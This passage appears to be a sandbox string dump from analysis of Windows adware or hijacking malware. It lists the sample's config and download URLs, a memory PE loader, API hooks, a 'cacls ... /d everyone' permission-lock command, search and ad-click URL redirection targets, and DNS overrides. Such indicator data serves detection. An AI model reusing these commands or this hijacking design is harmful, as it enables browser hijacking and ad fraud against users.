d:d:d</pre><pre>%SystemRoot%\System32\mswsock.dll</pre><pre>Tcpip</pre><pre>SupportedNameSpace</pre><pre>%SystemRoot%\System32\winrnr.dll</pre><pre>%SystemRoot%\system32\mswsock.dll</pre><pre>%SystemRoot%\system32\rsvpsp.dll</pre><pre>|%SystemRoot%\system32\rsvpsp.dll</pre><pre>000000000011</pre><pre>000000000010</pre><pre>000000000009</pre><pre>000000000008</pre><pre>000000000007</pre><pre>000000000006</pre><pre>000000000005</pre><pre>000000000004</pre><pre>000000000003</pre><pre>000000000002</pre><pre>000000000001</pre><pre>mswsock.dll</pre><pre>uncompress res:%d des_len:%d</pre><pre>uncompress x:X src_len:%d des_len:%d</pre><pre>uncompress crc:X X</pre><pre>User:%s</pre><pre>GetModuleFileNameW:X</pre><pre>GetModuleFileNameA:X</pre><pre>GetModuleHandleW:X</pre><pre>GetModuleHandleA:X</pre><pre>InitResult:%d</pre><pre>MemLoad szAppModule:%s</pre><pre>pDllMain:X</pre><pre>pMemoryAddress:X</pre><pre>BaseAddress pMemoryAddress:X</pre><pre>CalcTotalImageSize= %d</pre><pre>Not Found Dll: %s</pre><pre>%s ModuleHandle:X</pre><pre>Name:X FirstThunk:X OriginalFirstThunk:X</pre><pre>Frist Import Table:X</pre><pre>No Import Table</pre><pre>GetExeModule:%s</pre><pre>GetExeModule</pre><pre>0.pool.ntp.org</pre><pre>1.pool.ntp.org</pre><pre>2.pool.ntp.org</pre><pre>3.pool.ntp.org</pre><pre>0.gentoo.pool.ntp.org</pre><pre>1.gentoo.pool.ntp.org</pre><pre>2.gentoo.pool.ntp.org</pre><pre>3.gentoo.pool.ntp.org</pre><pre>0.asia.pool.ntp.org</pre><pre>1.asia.pool.ntp.org</pre><pre>2.asia.pool.ntp.org</pre><pre>3.asia.pool.ntp.org</pre><pre>17.82.253.7</pre><pre>203.117.180.36</pre><pre>time.asia.apple.com</pre><pre>64.236.96.53</pre><pre>130.149.17.21</pre><pre>clock.via.net</pre><pre>ntp.nasa.gov</pre><pre>time-a.nist.gov</pre><pre>stdtime.gov.hk</pre><pre>time.buptnet.edu.cn</pre><pre>ntp.rhrk.uni-kl.de</pre><pre>ntp.ipv6.uni-leipzig.de</pre><pre>129.7.1.66</pre><pre>ntp.sjtu.edu.cn</pre><pre>202.120.2.101</pre><pre>time-a.timefreq.bldrdoc.gov</pre><pre>time-b.timefreq.bldrdoc.gov</pre><pre>time-c.timefreq.bldrdoc.gov</pre><pre>utcnist.colorado.edu</pre><pre>d-d-d d:d:d</pre><pre>i:%d [%s] n_errno:%d</pre><pre>Ntp iStart:%d</pre><pre>http://www.iojjek.com/</pre><pre>http://www.iiewl.com/</pre><pre>SendMsg uMsg:%d dwResult:%d,</pre><pre>DownloadUriFromServer url:%s</pre><pre>%d.%d.%d</pre><pre>%d.%d.%d.%d</pre><pre>, bRet:%d</pre><pre>buff.is_down_ok:%d response->code:%d</pre><pre>, ret=%d buffer.body_Len=%d is_down_ok:%d can_break_points_transfer:%d</pre><pre>http://</pre><pre>Muxtex[%d]</pre><pre>%s, m_down_from_server:%d</pre><pre>buffer.length:%d</pre><pre>****:%s</pre><pre>[%d.%d.%d.%d:%d]</pre><pre>(%d):%s</pre><pre>, length:%d</pre><pre>szBackPath:%s</pre><pre>.ELOG</pre><pre>Bind Port:%d</pre><pre>ATL:X</pre><pre>RegQueryValueExA %s</pre><pre>User32.dll</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>RegOpenKeyExW</pre><pre>kernel32.dll</pre><pre>MY_RegOpenKeyExA:%s</pre><pre>\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}</pre><pre>RegOpenKeyExA:%s</pre><pre>software\policies\microsoft\windows nt\dnsclient</pre><pre>RegisterWindowMessageA:%s</pre><pre>NtCreateProcessEx hPrcess:X</pre><pre>NtCreateProcessEx dwParentPid:%d</pre><pre>NtCreateProcessEx ProcessHandle:X ParentProcess:X</pre><pre>dwParentPid:%d</pre><pre>Module:%s</pre><pre>dwRtlUserThreadStart:X</pre><pre>SysVersion:%d.%d.%d</pre><pre>ole32.dll</pre><pre>LoadPE(ole32.dll)</pre><pre>ole32.dll</pre><pre>dnsapi.dll</pre><pre>LoadPE(dnsapi.dll)</pre><pre>dnsapi.dll</pre><pre>wininet.dll</pre><pre>LoadPE(wininet.dll)</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpOpenRequestW</pre><pre>HttpOpenRequestA</pre><pre>wininet.dll</pre><pre>ws2_32.dll</pre><pre>LoadPE(ws2_32.dll)</pre><pre>ws2_32.dll</pre><pre>ntdll.dll</pre><pre>LoadPE(ntdll.dll)</pre><pre>IP:%s,Mac:X-X-X-X-X-X</pre><pre>SendTo NtDeviceIoControlFile Status:X</pre><pre>Status:X</pre><pre>Call NtDeviceIoControlFile, X</pre><pre>RecvFrom NtDeviceIoControlFile Status:X</pre><pre>%m/%d/%y</pre><pre>%H:%M:%S</pre><pre>%I:%M:%S %p</pre><pre>%x %X</pre><pre>Send File:%s</pre><pre>Open File:%s</pre><pre>send_count:%d</pre><pre>Tcp Accept Thread Exit.</pre><pre>:recv_len=%d</pre><pre>Tcp Accept Thread Proc</pre><pre>recv_len:%d</pre><pre>Tcp Accept Thread Start.</pre><pre>diff:%d timeout:%d</pre><pre>AddPeer cid:X TimeOut:%d IsTimeOut:%d</pre><pre>cid:X</pre><pre>~CUdpPeer()</pre><pre>, type:%d size:%d %d crc:X X ver:%d %d</pre><pre>Send SendRecvOK phdr->id:X phdr->type:%d</pre><pre>send_broadcast 0xFFFFFFFF ret:%d</pre><pre>send_broadcast ret:%d</pre><pre>TCP_PORT</pre><pre>UDP_PORT</pre><pre>TCP_PROTO_VER</pre><pre>UDP_PROTO_VER</pre><pre>RandBind port:%d</pre><pre>SetLockTimer index:%d uElapse:%d</pre><pre>Lock index:%d Hash:X Tick:%I64d OldStatus:%d</pre><pre>Keep m_TaskMutex[%d].Name=X</pre><pre>SendKeepPacket index:%d</pre><pre>re send id:X nSend:%d ret:%d to:%d.%d.%d.%d:%d</pre><pre>m_TaskMutex[%d]->res_list.count:%d</pre><pre>OnLockTimeOut m_TaskMutex[%d].Name=X Status:%d lock_perr[%d.%d.%d.%d:%d]</pre><pre>OnKeepTimeOut(%d) nKeepTimeOut:%d</pre><pre>OnRecvOK m_send_list.items:%d id:X</pre><pre>Send ReQueryLock ret:%d</pre><pre>Send QueryLock ret:%d</pre><pre>OnQueryLock %s Index:%d Hash:X</pre><pre>OnReplyLock m_TaskMutex[%d].Name=X Set Peer Info %d.%d.%d.%d:%d</pre><pre>OnReplyLock Set m_TaskMutex[%d].Name=X Status=MUTEX_STATUS_LOCK_FAILD</pre><pre>OnReplyLock m_TaskMutex[%d].Name=X Status:%d</pre><pre>OnLockOk m_TaskMutex[%d].Name=X Set Peer Info %d.%d.%d.%d:%d</pre><pre>OnReplyLockKeep Status:%d</pre><pre>OnDownOk m_TaskMutex[%d].Name=X Peer:%d.%d.%d.%d:%d</pre><pre>OnLockOver m_TaskMutex[%d].Name=X %s</pre><pre>m_TaskMutex[%d]->hDownThread=X</pre><pre>DownLoad(%d)</pre><pre>OnDownLoadOver Status:%d</pre><pre>Begin:X m_Item:X m_run:X m_End:X</pre><pre>FILE_TYPE_EXE cfg_idx:%d</pre><pre>FILE_TYPE_CFG bin_idx:%d</pre><pre>OnDownLoadModuleOver(X,%d) file_type:%d</pre><pre>index:%d time_out:%d down_time:M-d-d d:d:d</pre><pre>OnDownLoadCfgOver(X,%d)</pre><pre>cfg_md5: %s</pre><pre>cfg_url: %s</pre><pre>md5 : %s</pre><pre>url : %s</pre><pre>cfg_url</pre><pre>group:[%s]</pre><pre>idx:%d igroup:%d</pre><pre>Add Cfg Mutex:%s</pre><pre>Add Copy Cfg Mutex:%s</pre><pre>Add Bin Mutex:%s</pre><pre>Add Copy Bin Mutex:%s</pre><pre>Call End Fun:X ret:%d</pre><pre>NotInit:%d LockCount:%d NotRun:%d m_TaskMutex.size()=%d</pre><pre>NotInit:%d LockCount:%d NotRun:%d</pre><pre>zcÁ</pre><pre>%WinDir%\share\</pre><pre>58lm/temptation.bin</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe</pre><pre>GetCPInfo</pre><pre>RegCreateKeyExA</pre><pre>RegEnumKeyExA</pre><pre>RegCreateKeyA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>UrlUnescapeA</pre><pre>InternetCrackUrlA</pre><pre>InternetCanonicalizeUrlA</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.DLL</pre><pre>iphlpapi.dll</pre><pre>PSAPI.DLL</pre><pre>SHELL32.dll</pre><pre>SHLWAPI.dll</pre><pre>USER32.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>P2PDLL.dll</pre><pre>MSAFD Tcpip [TCP/IP]</pre><pre>MSAFD Tcpip [UDP/IP]</pre><pre>MSAFD Tcpip [RAW/IP]</pre><pre>RSVP UDP Service Provider</pre><pre>\Device\NetBT_Tcpip</pre><pre>RSVP TCP Service Provider</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2</pre><pre>tv_w32.dll</pre><pre>indicdll.dll</pre><pre>mshtml.dll</pre><pre>shell32.dll</pre><pre>msctfime.ime</pre><pre>msctf.dll</pre><pre>uxtheme.dll</pre><pre>RegQueryValueExW %s</pre><pre>RegOpenKeyExW:%s</pre><pre>RegisterWindowMessageW:%s</pre><b>objs.exe_3332:</b><pre>E.LLPlD'*</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>OLEACC.dll</pre><pre>PSAPI.DLL</pre><pre>phlpapi.dll</pre><pre>127.0.0.1</pre><pre>msvcrt</pre><pre>1.2.3</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>http://get.woai310.com/getconfig/minisite.ini</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>http://</pre><pre>WebClientWindow</pre><pre>WebBrowserPointer</pre><pre>http://site.minimenhu.com/sh/index.html</pre><pre>%WinDir%\share\rsvp\objs.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>UrlUnescapeA</pre><pre>EnumChildWindows</pre><pre>EnumWindows</pre><pre>InternetCanonicalizeUrlA</pre><pre>InternetCrackUrlA</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>O.qul5</pre><pre>KERNEL32.DLL</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHLWAPI.dll</pre><pre>USER32.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><b>EXE_temp3.exe_816_rwx_00401000_0008D000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>USER32.dll</pre><pre>58lm/temptation.bin</pre><pre>.IUQT</pre><pre>[.aoH</pre><pre>[8~%xs</pre><pre> .oN7</pre><pre>z.Tl&</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><b>EXE_temp3.exe_816_rwx_00DC0000_00053000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>iexplore.exe</pre><pre>%Program Files%\Internet Explorer\iexplore.exe</pre><pre>explorer.exe</pre><pre>igfxsrvc.exe</pre><pre>{5D562E5F-741F-4b50-AB7B-7A997CEB9557}</pre><pre>{XXXX-XX-XX-XX-XXXXXX}</pre><pre>cacls.exe "%s" /e /d everyone</pre><pre>%Program Files%\E-yoo\EyooSechelper2.dll</pre><pre>http://</pre><pre>XXXXXXXXXXXXXXXX</pre><pre>Software\Microsoft\Windows\ShellNoRoam\TempCache</pre><pre>Software\Microsoft\Windows\ShellNoRoam\ShellCache</pre><pre>herollq.exe</pre><pre>WebPlayer2010.exe</pre><pre>VODPlayer.exe</pre><pre>JSKPBrowser.exe</pre><pre>ValeBrowser.exe</pre><pre>wmconfig.exe</pre><pre>NewBho.DLL</pre><pre>\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object</pre><pre>software\policies\microsoft\windows nt\dnsclient</pre><pre>ws2_32.dll</pre><pre>ole32.dll</pre><pre>ieui.dll</pre><pre>mshtml.dll</pre><pre>IEFrame.dll</pre><pre>iertutil.dll</pre><pre>User32.dll</pre><pre>SHLWAPI.dll</pre><pre>wininet.dll</pre><pre>urlmon.dll</pre><pre>mswsock.dll</pre><pre>ws2help.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyExW</pre><pre>NtQueryValueKey</pre><pre>NtOpenKey</pre><pre>ADVAPI32.dll</pre><pre>ntdll.dll</pre><pre>Kernel32.dll</pre><pre>dnsapi.dll</pre><pre>msvcrt</pre><pre>PubwinClient.exe</pre><pre>RunMe.exe</pre><pre>{11F09AFE-75AD-4E52-AB43-E09E9351CE17}</pre><pre>Shell.User\Group</pre><pre>oleaut32.dll</pre><pre>browseti.dll</pre><pre>hinthk.dll</pre><pre>zclm8.com</pre><pre>wq581.com</pre><pre>maimeng8.com</pre><pre>5sla.com</pre><pre>wb360.net</pre><pre>renren.com</pre><pre>jj123.com.cn</pre><pre>wb12318.com</pre><pre>iwb110.com</pre><pre>woai310.com</pre><pre>http://123.sogou.com</pre><pre>http://www.sogou.com/sogou</pre><pre>http://www.sogou.com/index</pre><pre>.info</pre><pre>http://baidu.com</pre><pre>{X-X-x-XX-XXXXXX}</pre><pre>www.soso.com</pre><pre>www.google.com</pre><pre>www.hao123.com</pre><pre>www.tao123.com</pre><pre>www.baidu.com</pre><pre>123.sogou.com</pre><pre>www.sogou.com</pre><pre>www.iwb110.com</pre><pre>rpcrt4.dll</pre><pre>kernel32.dll</pre><pre>{xxxx-xx-xx-xx-xxxxxx}</pre><pre>127.0.0.1</pre><pre>208.67.222.222</pre><pre>208.67.220.220</pre><pre>114.114.114.114</pre><pre>114.114.115.115</pre><pre>8.8.8.8</pre><pre>8.8.8.9</pre><pre>8.8.4.4</pre><pre>Shell.Dusn</pre><pre>1.2.3</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>ZwQueryValueKey</pre><pre>ZwOpenKey</pre><pre>SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}</pre><pre>xxxxxx</pre><pre>http://www.baidu.com/adrc.php?</pre><pre>http://www.baidu.com/baidu.php?</pre><pre>http://www.baidu.com/s?</pre><pre>http://www.hao123.com/?</pre><pre>http://123.sogou.com/?</pre><pre>http://www.sogou.com/img/fav.ico?</pre><pre>http://pv.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/cl.gif?</pre><pre>http://www.google.com/aclk?</pre><pre>http://www.sogou.com/bill_</pre><pre>http://www.sogou.com/sogou?</pre><pre>http://test.hermes.sogou.com/sa.gif?</pre><pre>http://www.sogou.com/index.htm</pre><pre>118.145.16.80</pre><pre>%SystemRoot%\System32\mswsock.dll</pre><pre>Tcpip</pre><pre>SupportedNameSpace</pre><pre>%SystemRoot%\System32\winrnr.dll</pre><pre>%SystemRoot%\system32\mswsock.dll</pre><pre>%SystemRoot%\system32\rsvpsp.dll</pre><pre>|%SystemRoot%\system32\rsvpsp.dll</pre><pre>000000000011</pre><pre>000000000010</pre><pre>000000000009</pre><pre>000000000008</pre><pre>000000000007</pre><pre>000000000006</pre><pre>000000000005</pre><pre>000000000004</pre><pre>000000000003</pre><pre>000000000002</pre><pre>000000000001</pre><pre>shdocvw.dll</pre><pre>ieframe.dll</pre><pre>http://www.sogou.com/sogou?query=</pre><pre>sogou-netb-xx-d</pre><pre>%%X</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>HttpOpenRequestW</pre><pre>HttpOpenRequestA</pre><pre>HttpAddRequestHeaders</pre><pre>\StringFileInfo\xx\%s</pre><pre>user32.dll</pre><pre>6.0.2800.1106</pre><pre>6.00.2600.0000</pre><pre>6.00.2600.0000 (xpclient.010817-1148)</pre><pre>6.00.2737.800</pre><pre>6.00.2800.1106</pre><pre>6.00.2800.1106 (xpsp1.020828-1920)</pre><pre>6.00.2800.1400</pre><pre>6.00.2800.1485</pre><pre>6.00.2800.1496</pre><pre>6.00.2800.1603</pre><pre>6.00.2800.1607</pre><pre>6.00.2800.1611</pre><pre>6.00.2800.1615</pre><pre>6.00.2800.1617</pre><pre>6.00.2800.1623</pre><pre>6.00.2800.1627</pre><pre>6.00.2800.1632</pre><pre>6.00.2800.1644</pre><pre>6.00.2800.1649</pre><pre>6.00.2800.1650</pre><pre>6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)</pre><pre>6.00.2900.2518 (xpsp.040919-1030)</pre><pre>6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)</pre><pre>6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)</pre><pre>6.00.2900.2598 (xpsp.041130-1728)</pre><pre>6.00.2900.2627 (xpsp.050309-1719)</pre><pre>6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)</pre><pre>6.00.2900.2668 (xpsp.050430-1553)</pre><pre>6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)</pre><pre>6.00.2900.2713 (xpsp.050702-1518)</pre><pre>6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)</pre><pre>6.00.2900.2753 (xpsp.050902-1331)</pre><pre>6.00.2900.2781 (xpsp.051020-1728)</pre><pre>6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)</pre><pre>6.00.2900.2823 (xpsp.060106-1527)</pre><pre>6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)</pre><pre>6.00.2900.2861 (xpsp.060303-1528)</pre><pre>6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)</pre><pre>6.00.2900.2904 (xpsp.060509-0230)</pre><pre>6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)</pre><pre>6.00.2900.2937 (xpsp.060623-0011)</pre><pre>6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)</pre><pre>6.00.2900.2995 (xpsp.060913-0019)</pre><pre>6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)</pre><pre>6.00.2900.3020 (xpsp.061023-0222)</pre><pre>6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)</pre><pre>6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)</pre><pre>6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)</pre><pre>6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)</pre><pre>6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)</pre><pre>6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)</pre><pre>6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)</pre><pre>6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)</pre><pre>6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)</pre><pre>6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)</pre><pre>6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)</pre><pre>6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)</pre><pre>6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)</pre><pre>6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)</pre><pre>6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)</pre><pre>6.00.2900.3300 (xpsp.080125-2028)</pre><pre>6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)</pre><pre>6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)</pre><pre>6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)</pre><pre>6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)</pre><pre>6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)</pre><pre>6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)</pre><pre>6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)</pre><pre>6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)</pre><pre>6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)</pre><pre>6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)</pre><pre>6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)</pre><pre>6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)</pre><pre>6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)</pre><pre>6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)</pre><pre>6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)</pre><pre>6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)</pre><pre>6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)</pre><pre>6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)</pre><pre>6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)</pre><pre>6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)</pre><pre>6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)</pre><pre>6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)</pre><pre>6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)</pre><pre>6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)</pre><pre>6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)</pre><pre>6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)</pre><pre>6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)</pre><pre>6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)</pre><pre>6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)</pre><pre>6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)</pre><pre>6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)</pre><pre>6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)</pre><pre>6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)</pre><pre>6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)</pre><pre>6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)</pre><pre>6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)</pre><pre>6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)</pre><pre>6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)</pre><pre>6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)</pre><pre>6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)</pre><pre>6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)</pre><pre>6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)</pre><pre>6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)</pre><pre>6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)</pre><pre>6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)</pre><pre>6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)</pre><pre>6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)</pre><pre>6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)</pre><pre>6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)</pre><pre>6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)</pre><pre>6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)</pre><pre>6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)</pre><pre>6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)</pre><pre>6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)</pre><pre>6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)</pre><pre>6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)</pre><pre>6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)</pre><pre>6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)</pre><pre>6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)</pre><pre>6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)</pre><pre>6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)</pre><pre>6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)</pre><pre>6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)</pre><pre>6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)</pre><pre>6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)</pre><pre>6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)</pre><pre>6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)</pre><pre>6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)</pre><pre>6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)</pre><pre>6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)</pre><pre>6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)</pre><pre>6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)</pre><pre>6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)</pre><pre>6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)</pre><pre>6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)</pre><pre>6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)</pre><pre>6.00.3790.0 (srv03_rtm.030324-2048)</pre><pre>6.00.3790.118 (srv03_gdr.031205-1652)</pre><pre>6.00.3790.118 (srv03_qfe.031205-1652)</pre><pre>6.00.3790.1830 (srv03_sp1_rtm.050324-1447)</pre><pre>6.00.3790.186 (srv03_gdr.040410-1234)</pre><pre>6.00.3790.186 (srv03_qfe.040410-1236)</pre><pre>6.00.3790.2509 (srv03_sp1_gdr.050815-1517)</pre><pre>6.00.3790.2653 (srv03_sp1_gdr.060303-1536)</pre><pre>6.00.3790.2653 (srv03_sp1_qfe.060303-1552)</pre><pre>6.00.3790.2732 (srv03_sp1_gdr.060623-0310)</pre><pre>6.00.3790.2732 (srv03_sp1_qfe.060623-0318)</pre><pre>6.00.3790.2817 (srv03_sp1_gdr.061023-0100)</pre><pre>6.00.3790.2993 (srv03_sp1_gdr.070817-1316)</pre><pre>6.00.3790.2993 (srv03_sp1_qfe.070817-1316)</pre><pre>6.00.3790.3041 (srv03_sp1_gdr.071107-1901)</pre><pre>6.00.3790.3041 (srv03_sp1_qfe.071107-1901)</pre><pre>6.00.3790.3091 (srv03_sp1_gdr.080215-1206)</pre><pre>6.00.3790.3091 (srv03_sp1_qfe.080215-1206)</pre><pre>6.00.3790.3194 (srv03_sp1_gdr.080819-1207)</pre><pre>6.00.3790.3194 (srv03_sp1_qfe.080819-1207)</pre><pre>6.00.3790.3229 (srv03_sp1_gdr.081016-1620)</pre><pre>6.00.3790.3229 (srv03_sp1_qfe.081016-1620)</pre><pre>6.00.3790.3304 (srv03_sp1_gdr.090303-1204)</pre><pre>6.00.3790.3304 (srv03_sp1_qfe.090303-1204)</pre><pre>6.00.3790.3959 (srv03_sp2_rtm.070216-1710)</pre><pre>6.00.3790.4186 (srv03_sp2_gdr.071108-1306)</pre><pre>6.00.3790.4186 (srv03_sp2_qfe.071108-1306)</pre><pre>6.00.3790.4210 (srv03_sp2_qfe.071221-1418)</pre><pre>6.00.3790.4237 (srv03_sp2_gdr.080215-1206)</pre><pre>6.00.3790.4237 (srv03_sp2_qfe.080215-1206)</pre><pre>6.00.3790.4275 (srv03_sp2_gdr.080417-1307)</pre><pre>6.00.3790.4275 (srv03_sp2_qfe.080417-1307)</pre><pre>6.00.3790.4324 (srv03_sp2_qfe.080630-1205)</pre><pre>6.00.3790.4357 (srv03_sp2_gdr.080819-1207)</pre><pre>6.00.3790.4357 (srv03_sp2_qfe.080819-1207)</pre><pre>6.00.3790.4392 (srv03_sp2_gdr.081016-1620)</pre><pre>6.00.3790.4392 (srv03_sp2_qfe.081016-1620)</pre><pre>6.00.3790.4470 (srv03_sp2_gdr.090303-1204)</pre><pre>6.00.3790.4470 